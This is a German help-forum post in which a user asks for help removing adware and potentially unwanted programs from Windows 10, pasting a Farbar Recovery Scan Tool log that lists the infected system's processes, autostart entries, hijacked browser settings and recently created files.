| |  Win 10: jede Menge PUP
 Hallo zusammen,
gestern wollte ich mir Software herunterladen und bin wohl auf einer falschen Seite gelandet und habe mir jede Menge Mist eingefangen. Dummerweise habe ich bisher versäumt, einen Virenscanner zu installieren. :Stirn:
Frst.txt Zitat:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 12-02-2017
durchgeführt von Barbara (Administrator) auf BARBARA-PC (13-02-2017 19:07:20)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Geladene Profile: Barbara (Verfügbare Profile: Barbara)
Platform: Windows 10 Pro Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Edge)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Computer, Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
() C:\ProgramData\Logic Handler\set.exe
() C:\Program Files (x86)\da002918-daba-4445-a323-cc3eefdf9d091486934027\protda002918-daba-4445-a323-cc3eefdf9d09.tmpfs
() C:\Windows\SysWOW64\NetUtils2016.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
() C:\ProgramData\NetworkPacketManitor\Nettrans.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Search Module Ltd.) C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe
() C:\ProgramData\Zaamla\Zaamla.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
() C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe
() C:\Program Files (x86)\SystemHealer\HealerConsole.exe
(Microsoft Corporation) C:\Windows\System32\runonce.exe
() C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe
(PC Clean Plus) C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe
() C:\Users\Barbara\AppData\Roaming\Event Monitor\em.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Spotify Ltd) C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
() C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
() C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
() C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-23] (Microsoft Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [gplyra] => C:\Users\Barbara\AppData\Roaming\gplyra\gplyra\start.cmd [216 2017-01-10] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKLM-x32\...\Run: [BestCleaner] => C:\Program Files (x86)\BeCleaner\BestCleaner.exe [180736 2017-02-10] () <===== ACHTUNG
HKLM-x32\...\Run: [MyMemory] => C:\Program Files (x86)\MyMemory\MyMemory.exe [7572480 2017-02-07] (TODO: <Company name>) <===== ACHTUNG
HKLM-x32\...\Run: [AppTrailers] => C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe [47824832 2016-09-29] () <===== ACHTUNG
HKLM\...\RunOnce: [OMEWPRODUCT_HYWXX] => C:\Program Files (x86)\BeCleaner\9J3PGU1187X4TMA.exe [153088 2017-02-12] (UREVJU) <===== ACHTUNG
HKLM\...\RunOnce: [wd] => C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe [248320 2017-02-12] () <===== ACHTUNG
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify Web Helper] => C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1444976 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify] => C:\Users\Barbara\AppData\Roaming\Spotify\Spotify.exe [7153264 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Steam] => c:\Program Files (x86)\Steam\steam.exe [2851408 2016-07-09] (Valve Corporation)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-26] (Piriform Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [JG5BHCSAVC] => C:\Program Files\IQ50062YNB\IQ50062YN.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [LAMMPX75X6] => C:\Program Files\WR5TG73LV7\WR5TG73LV.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [XN55R0BYZD] => C:\Program Files\P3ZUK80JKY\P3ZUK80JK.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [JLAWFPN14I] => C:\Program Files (x86)\BeCleaner\KDGFQ.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [x5o3Yv2CQw.exe] => C:\Users\Barbara\AppData\Roaming\{e96-e1-84-c5451-ad240-9cea-aa139}\x5o3Yv2CQw.exe [635392 2017-02-12] (Abakita)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [zC6b23GTAV.exe] => C:\Users\Barbara\AppData\Roaming\{e96-e1-84-c5451-ad240-9cea-aa139}\zC6b23GTAV.exe [839680 2017-02-12] (Skoat)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [GWH9N93A6U] => C:\Program Files\8K5F5GX6AI\8K5F5GX6A.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [806400 2016-07-16] (Microsoft Corporation)
HKLM\...\Providers\pfqv62f8: C:\Program Files (x86)\Atikationbogot System\local64spl.dll [316928 2017-02-12] ()
AppInit_DLLs: C:\ProgramData\Zaamla\ItTone.dll => C:\ProgramData\Zaamla\ItTone.dll [358912 2017-02-12] ()
AppInit_DLLs-x32: C:\ProgramData\Zaamla\Stockdax.dll => C:\ProgramData\Zaamla\Stockdax.dll [248320 2017-02-12] ()
ShellExecuteHooks: Kein Name - {12BEB57E-ECD3-11E6-A98A-64006A5CFC23} - C:\Users\Barbara\AppData\Roaming\Zrshfcit\Griotain.dll [151040 2017-02-12] ()
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{92a07177-073c-4d90-93ea-d374613fc39e}: [DhcpNameServer] 192.168.2.1
Internet Explorer:
==================
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLxxeue_LfBniAwPOzhhFS9wqdYjLMPBpDF_cFF10OMductpH2orS0SPHJ15zmib i1UNejSP02PSmH5BeJQj1SlwLAsV&q={searchTerms}
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLBQ-yUvPMKJd_hXouLV6TefGjkhjHVNrNwcsUwRBbMirINNU5piuT97tFvj4PSdGQMEe5e6hmP11fdFwVSJM1MfPXvr
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLxxeue_LfBniAwPOzhhFS9wqdYjLMPBpDF_cFF10OMductpH2orS0SPHJ15zmib i1UNejSP02PSmH5BeJQj1SlwLAsV&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1500252791-3377746768-789393517-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLxxeue_LfBniAwPOzhhFS9wqdYjLMPBpDF_cFF10OMductpH2orS0SPHJ15zmib i1UNejSP02PSmH5BeJQj1SlwLAsV&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1500252791-3377746768-789393517-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLxxeue_LfBniAwPOzhhFS9wqdYjLMPBpDF_cFF10OMductpH2orS0SPHJ15zmib i1UNejSP02PSmH5BeJQj1SlwLAsV&q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-07-30] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-07-30] (Oracle Corporation)
FireFox:
========
FF DefaultProfile: 8rnx3iua.default
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\8rnx3iua.default\Profiles\8rnx3iua.default [nicht gefunden]
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default [2017-02-12]
FF NewTab: Mozilla\Firefox\Profiles\8rnx3iua.default -> C:\\ProgramData\\Zaamlas\\ff.NT
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\8rnx3iua.default -> youndoo
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\8rnx3iua.default -> youndoo
FF Homepage: Mozilla\Firefox\Profiles\8rnx3iua.default -> about:home
FF Keyword.URL: Mozilla\Firefox\Profiles\8rnx3iua.default -> hxxp://www-searching.com/search.aspx?site=shdefault1&prd=smw&pid=s&shr=d&q={searchTerms}&s=H2Czbcnbl1AU,e757b544-b7e3-4f69-a055-fbd9a7e08b83,
FF Extension: (2020 3D Viewer for IKEA) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\2020Player_IKEA@2020Technologies.com [2016-12-16]
FF Extension: (Firefox Hotfix) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-01]
FF Extension: (Ghostery) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox@ghostery.com.xpi [2017-02-12]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-07-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-07-30] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S2 75c01d6e164de53703a6a972b8072a72; C:\Program Files\75c01d6e164de53703a6a972b8072a72\bdd7b1f8de41e5dd7822ff604fc87f53.exe [39236096 2017-02-10] () [Datei ist nicht signiert] <==== ACHTUNG
S2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 backlh; C:\ProgramData\Logic Handler\set.exe [3786752 2017-02-12] () [Datei ist nicht signiert]
R2 Bonjour Service; C:\Program Files (x86)\Bonjour\mDNSResponder.exe [229376 2006-02-28] (Apple Computer, Inc.) [Datei ist nicht signiert]
S2 Dalidom; C:\Program Files (x86)\Plidaing\Konoghstuqtainmodule.dll [154624 2017-02-12] () [Datei ist nicht signiert]
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-09-03] (Macrovision Europe Ltd.) [Datei ist nicht signiert]
S2 Hayzumflex; C:\ProgramData\\Hayzumflex\\Hayzumflex.exe [983040 2017-02-12] () [Datei ist nicht signiert]
R2 Nettrans; C:\ProgramData\NetworkPacketManitor\Nettrans.exe [43520 2017-02-12] () [Datei ist nicht signiert]
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2017-02-12] ()
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-01-20] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2142728 2016-10-22] (Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [2209296 2016-10-22] (Electronic Arts)
R2 OtherSearch; C:\Program Files (x86)\vpF0TnTYqt\kl.dll [1107456 2017-02-11] () [Datei ist nicht signiert] <==== ACHTUNG
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2889896 2016-09-15] (Microsoft Corporation)
R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3109888 2017-02-12] (Search Module Ltd.) [Datei ist nicht signiert]
S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [1450064 2016-07-09] (Valve Corporation) [Datei ist nicht signiert]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 Zaamla; C:\ProgramData\\Zaamla\\Zaamla.exe [983040 2017-02-12] () [Datei ist nicht signiert]
R2 gemeloki; C:\Program Files (x86)\da002918-daba-4445-a323-cc3eefdf9d091486934027\protda002918-daba-4445-a323-cc3eefdf9d09.tmpfs [X]
S2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R1 f200152859a3da102f1abf6a29e00daf; C:\WINDOWS\system32\drivers\f200152859a3da102f1abf6a29e00daf.sys [95048 2017-02-10] (REMFFW) <==== ACHTUNG
R1 Lace514; C:\WINDOWS\System32\drivers\Lace_wpf_x64.sys [69400 2017-02-09] (Lace514)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-02-12] () <==== ACHTUNG
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispiwu.inf_amd64_b67dc924fff8de6d\nvlddmkm.sys [14199224 2017-01-04] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-01-20] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2017-01-20] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-01-20] (NVIDIA Corporation)
R2 Sentinel64; C:\WINDOWS\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc.)
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2017-02-12] ()
S3 SNTUSB64; C:\WINDOWS\System32\drivers\SNTUSB64.SYS [63528 2011-05-27] (SafeNet, Inc.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S1 cvjjfjaa; \??\C:\WINDOWS\system32\drivers\cvjjfjaa.sys [X]
U3 idsvc; kein ImagePath
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-02-13 19:07 - 2017-02-13 19:07 - 00000000 ____D C:\FRST
2017-02-13 19:06 - 2017-02-13 19:07 - 00000000 ____D C:\Users\Barbara\Desktop\Virenscanner etc
2017-02-12 22:20 - 2017-02-12 22:20 - 00000000 ____D C:\ProgramData\3e6b6889-0047-0
2017-02-12 22:16 - 2017-02-13 19:06 - 00000000 ____D C:\Users\Barbara\AppData\Local\AppTrailers
2017-02-12 22:16 - 2017-02-12 22:16 - 00326144 _____ C:\ProgramData\smp2.exe
2017-02-12 22:16 - 2017-02-12 22:16 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2017-02-12 22:16 - 2017-02-12 22:16 - 00004420 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_323832303833353732332d374a55414134502a576c4a5a
2017-02-12 22:16 - 2017-02-12 22:16 - 00004246 _____ C:\WINDOWS\System32\Tasks\SMW_P
2017-02-12 22:16 - 2017-02-12 22:16 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppTrailers
2017-02-12 22:16 - 2017-02-12 22:16 - 00000000 ____D C:\ProgramData\SearchModule
2017-02-12 22:16 - 2017-02-12 22:16 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2017-02-12 22:16 - 2017-02-12 22:16 - 00000000 ____D C:\Program Files\8K5F5GX6AI
2017-02-12 22:15 - 2017-02-13 19:06 - 00000000 ____D C:\Program Files (x86)\vpF0TnTYqt
2017-02-12 22:15 - 2017-02-12 22:24 - 00000000 ____D C:\ProgramData\Zaamla
2017-02-12 22:15 - 2017-02-12 22:20 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\System Healer
2017-02-12 22:15 - 2017-02-12 22:16 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\AppTrailers
2017-02-12 22:15 - 2017-02-12 22:15 - 01938537 _____ C:\Users\Barbara\AppData\Roaming\Tonex.bin
2017-02-12 22:15 - 2017-02-12 22:15 - 01907481 _____ C:\Users\Barbara\AppData\Roaming\Flex-Fix.tst
2017-02-12 22:15 - 2017-02-12 22:15 - 00024494 _____ C:\WINDOWS\System32\Tasks\{7D0D0E47-797A-7F7A-7D11-7D797E041105}
2017-02-12 22:15 - 2017-02-12 22:15 - 00003690 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2017-02-12 22:15 - 2017-02-12 22:15 - 00003686 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2017-02-12 22:15 - 2017-02-12 22:15 - 00003420 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
2017-02-12 22:15 - 2017-02-12 22:15 - 00003360 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2017-02-12 22:15 - 2017-02-12 22:15 - 00003350 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2017-02-12 22:15 - 2017-02-12 22:15 - 00002052 _____ C:\WINDOWS\System32\Tasks\EhXuia58iw
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____H C:\WINDOWS\system32\BITB228.tmp
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\One System Care
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\Zaamlas
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Socia2Sear Browser Enhancer
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\f09cf6fd-6885-0
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\f09cf6fd-67a5-1
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\3e6b6889-6e95-0
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\3e6b6889-6d45-1
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2017-02-12 22:15 - 2017-02-12 22:14 - 00983040 _____ C:\Users\Barbara\AppData\Roaming\Flex-Fix.exe
2017-02-12 22:14 - 2017-02-13 19:05 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-02-12 22:14 - 2017-02-13 19:05 - 00003110 _____ C:\WINDOWS\System32\Tasks\RunAtStartup
2017-02-12 22:14 - 2017-02-13 19:05 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\PC Clean Plus
2017-02-12 22:14 - 2017-02-13 19:05 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Event Monitor
2017-02-12 22:14 - 2017-02-12 22:27 - 00003184 _____ C:\WINDOWS\System32\Tasks\PC Clean Plus
2017-02-12 22:14 - 2017-02-12 22:24 - 00000312 _____ C:\WINDOWS\Tasks\PC Clean Plus_UPDATES.job
2017-02-12 22:14 - 2017-02-12 22:24 - 00000304 _____ C:\WINDOWS\Tasks\PC Clean Plus_DEFAULT.job
2017-02-12 22:14 - 2017-02-12 22:15 - 00000000 ____D C:\Program Files\75c01d6e164de53703a6a972b8072a72
2017-02-12 22:14 - 2017-02-12 22:14 - 01938537 _____ C:\Users\Barbara\AppData\Roaming\Bioity.bin
2017-02-12 22:14 - 2017-02-12 22:14 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-02-12 22:14 - 2017-02-12 22:14 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2017-02-12 22:14 - 2017-02-12 22:14 - 00278520 _____ C:\Users\Barbara\AppData\Roaming\SonZoolux.bin
2017-02-12 22:14 - 2017-02-12 22:14 - 00003294 _____ C:\WINDOWS\System32\Tasks\PC Clean Plus_DEFAULT
2017-02-12 22:14 - 2017-02-12 22:14 - 00003274 _____ C:\WINDOWS\System32\Tasks\HDWallPaper
2017-02-12 22:14 - 2017-02-12 22:14 - 00003120 _____ C:\WINDOWS\System32\Tasks\PC Clean Plus_UPDATES
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\WINDOWS\SysWOW64\sstmp
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\WINDOWS\system32\SSL
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\HDWallPaper
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\gplyra
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Local\Reabation
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Clean Plus
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HDWallPaper
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\ProgramData\Logic Handler
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Program Files (x86)\pccleanplus
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Program Files (x86)\PC Clean Plus
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Program Files (x86)\HDWallPaper
